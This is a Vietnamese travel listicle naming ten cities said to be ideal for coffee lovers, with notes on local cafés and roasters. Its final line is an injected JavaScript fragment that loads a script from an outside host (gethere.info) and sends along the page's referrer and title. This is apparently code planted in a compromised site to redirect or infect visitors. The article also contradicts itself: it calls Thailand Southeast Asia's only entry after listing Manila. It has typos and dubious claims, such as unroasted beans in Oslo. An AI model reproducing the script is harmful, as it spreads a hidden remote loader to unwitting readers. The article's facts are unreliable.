10 điểm đến lý tưởng nhất dành cho những người yêu cà phê trên thế giới

Cà phê là thức uống phổ biến nhất trên thế giới, chính bởi vậy, không quá bất ngờ khi mà nó có nhiều fan đến như vậy. Khắp mọi nơi đều thấy sự hiện diện của loại hạt này. Tuy nhiên, dưới đây mới thực sự là 10 điểm đến thiên đường cho những người yêu cà phê trên toàn thế giới.

#1 Sacramento, Mỹ

sacramento

Sacramento được mệnh danh là “thành phố cà phê” tại Hoa Kỳ. Thị trường này vốn đã khá sầm uất dưới danh tiếng của California. Hầu hết những người dân địa phương ở đây đều là chủ tiệm cà phê; chẳng mấy ai phải mua ngoài loại thức uống này. Chính bởi vậy, người ta phục vụ chủ yếu những vị khách du lịch trong và ngoài nước. Theo một nghiên cứu gần đây nhất, Sacramento là thành phố có chất lượng các quán cà ohee độc nhất tốt nhất nước Mỹ và có khả năng đứng Top đầu thế giới.

Với nhiều tổ chức, hiệp hội rang xay cà phê dẫn đến cà phê ở đây được đánh giá rất cao như Temple Coffee Roasters, dẫn đầu về chất lượng cà phê hay theo sau đó là Coffee Review, Old Soul Co., Insight Coffee Roasters, Fluid Espresso Bar,…

#2 Manila, Philippin

manila

Thị trường cà phê đang phát triển mạnh ở Manila với những sắc màu rực rỡ, vốn vội vã của Philippines. Duck & Buvette, nằm tại Shangri-La Plaza, là một trong những quán cà phê sóng thứ ba mọc lên khắp thành phố, phục vụ loại cà phê V60 cũng những món ăn đầy sáng tạo như vịt confit và thịt xông khói.

Ở đây, người ta cũng ưa chuộng cà phê Cappuccino truyền thống. Craft Coffee Revolution là cửa hàng dẫn đầu trào lưu này với văn hóa uống cà phê có những thời điểm lên tới 25,5 triệu người ở trung tâm Manila.

#3 Vancouver, Canada

vancouver

Vancouver là trung tâm cà phê của Canada. Ở đây có thể là Starbucks hoặc Tim Hortons, sử dụng những hạt cà phê được nhập trực tiếp từ người dân địa phương.

Bên cạnh đó, ở đây cũng còn một số đại gia lớn trong ngành công nghiệp cà phê rang xay như  Revolver, Prado, Kafka’s Coffee và 49th Parallel. Có một cà phê tại Vancouver – phục vụ chủ yếu Espresso.

#4 Dublin, Ireland

dublin

Dublin là một thành phố nổi tiếng với rượu hơn là cà phê. Tuy nhiên, thành phố sầm uất của Ireland dường như đang trong “cơn say” với loại thức uống này khi mà hầu hết các cửa hàng mở ở trung tâm thành phố phục vụ Espresso như Vic Coffee Inc., The Fixx, Bald Barista,…

#5 Đài Bắc, Đài Loan

taipei

Một người bạn của tôi sống ở Đài Bắc nói rằng giới trẻ ở đây không thích đến những quán bar, họ thích tụ tập ở những quán cà phê hơn. Không giống như những đô thị sầm uất khác, đây là thành phố cà phê ngập tràn – nó dường như có thể trở thành di sản quốc gia và nêu rõ ý thức về bản sắc.

Fong Da là các cửa hàng lâu đời nhất và nổi tiếng nhất trong thành phố. Đài Loan nổi tiếng với loại cà phê đá. GetMoreLab và OKLao Farms là một trong những cửa hàng mới nhập khẩu hạt chất lượng cao từ các nhà sản xuất  cà phê rang xay quốc tế và phục vụ cho những người trẻ tuổi. Sẽ không khó khăn gì để bạn tìm thấy một quán cà phê làm điểm dừng chân trong thành phố này, theo thống kế thì có đến hàng trăm điểm cho bạn lựa chọn.

#6 Oslo, Na Uy

oslo

Những cốc cà phê ở Oslo thật sự đặc biệt. Người ta đổ nước lên những hạt cà phê chất lượng cao chưa được rang và để nhỏ giọt đó vào cốc của bạn. Oliver Strand là quán cà phê tiêu biểu nhất tại đây. Mọi người dẫn những đứa trẻ của họ đến đây, tìm cho chúng những quyển sách và tự thư giãn bên những ly cà phê kinh loại hình trụ thật đặc biệt.

#7 Denver, Mỹ

denver

Theo một cuộc khảo sát, Denver đứng thứ 4 trong những thành phố tiêu thụ nhiều cà phê nhất nước Mỹ. Ở đây hội tụ nhiều chuyên gia pha chế có kinh nghiệm lâu năm, sử dụng loại cà phê của địa phương mà nổi bật trong số đó là cà phê Novo.

Tại đây còn có thương hiệu cà phê rang xay tốt nhất nước Mỹ năm 2014, Coda Coffee Co.

#8 Paris, Pháp

paris

Paris thường sánh đôi với Rome trong bất cứ danh sách nào. Tuy nhiên, đây là một trường hợp ngoài lệ khi văn hóa uống cà phê ở Paris thực sự khiến người ta ngỡ ngàng. Hầu hết các quán cà phê của Paris đều dải những chiếc ghế gỗ tựa dọc vỉa hè thành phố, là nơi mọi người nói chuyện, hút thuốc lá,…

Một số quán cà phê nổi tiếng như Spyglass, Télescope, Coutume Café và Ten Belles mọc lên bên cả hai mặt của dòng sông Seine.

#9 Moscow, Nga

moscow

Văn hóa uống cà phê đến với Moscow quá muộn và dường như nó chưa thực sự phát triển nhanh, nhưng trong vài năm trở lại đây, người ta đã chứng kiến những cửa hàng cà phê đắt tiền mọc lên hàng loạt ở thành phố này – loại cà phê đen đặc biệt.

#10 Bangkok, Thái Lan

bangkok

Thái Lan là đại diện duy nhất của Đông Nam Á trong Top 10 này. Đất nước này mạnh về du lịch hơn bất cứ đất nước nào trên thế giới. Họ chào đón những vị khách bằng cà phê.

Mọi công đoạn để tạo ra cốc cà phê ngon đều được thực hiện gói gọn từ thu hoạch, sấy khô đến rang,…Một số quán cà phê nổi tiếng của Bangkok như Casa Lapin, Tribeca Restobar và Rocket Coffeebar phục vụ chủ yếu Espresso. Do Thái Lan có khí hậu nhiệt đới nên một số phục vụ cà phê đá kèm kem.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;